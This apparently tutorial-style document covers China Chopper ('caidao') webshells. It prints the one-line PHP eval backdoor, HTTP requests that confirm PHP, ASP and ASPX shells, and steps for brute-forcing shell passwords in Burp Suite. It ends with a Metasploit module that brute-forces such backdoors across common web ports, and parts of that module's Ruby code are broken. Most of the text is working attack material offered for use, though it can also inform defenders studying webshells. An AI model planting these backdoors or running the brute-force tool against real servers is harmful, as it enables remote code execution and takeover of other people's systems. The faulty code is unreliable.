Backdoor Request
PHP Backdoor: <?php @eval($_POST["OP"]);?>
HTTP Request:
POST /bk.php
....
op=phpinfo();
If it's successful, phpinfo page will show us.
ASP Backdoor:
HTTP Request:
POST /bk.asp
op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response. end")
If it's successful, 'woo5woo' page will show us.
ASPX Backdoor:
HTTP Request:
POST /bk.aspx
op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")
If it's successful, 'woo5woo' page will show us.
Crack a php backdoor
For Example, we will crack caidao php backdoor step by step.
1. We create a html login form to learn how to use php backdoor.
Press the lable called "Click Here", we will see HTTP request in burpsuite.
send it to intruder, and make "adminadmin" as a intruder variable.
Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.
Crack backdoors with metasploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize(info = {})
super(update_info(info,
'Name' => 'Chinese Caidao Backdoor Bruteforce',
'Description' => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
'Author' => [ 'Nixawk' ],
'References' =>
[
[ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
],
'License' => MSF_LICENSE
))
register_options([
OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])
OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
end
def backdoor_brute(uri, user, pass, payload, match)
begin
data = "&user=#{user}{pass}=#{payload}"
res = send_request_cgi({
'uri' => uri,
'method' => "POST",
'data' => "#{data}"
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT
print_error("#{peer} - Service failed to respond")
return :abort
end
print_status("#{peer} - brute force caidao password: \"#{pass}\"")
if res and res.code == 200 and res.body =~ /#{match}/mi
print_good("#{peer} - Successful login: password - \"#{pass}\"")
return :next_user
end
return
end
def run_host(ip)
uri = normalize_uri(target_uri.path)
script_type = datastore['TYPE']
junk = Rex::Text::rand_text_alphanumeric(4)
match = "#{junk}4#{junk}"
case script_type
when /php$/mi
payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";
when /asp$/mi
payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"
when /aspx$/mi
payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"
else
print_error("#{peer} - Backddor type is not support")
return
end
each_user_pass { |user, pass|
backdoor_brute(uri, user, pass, payload, match)
}
end
end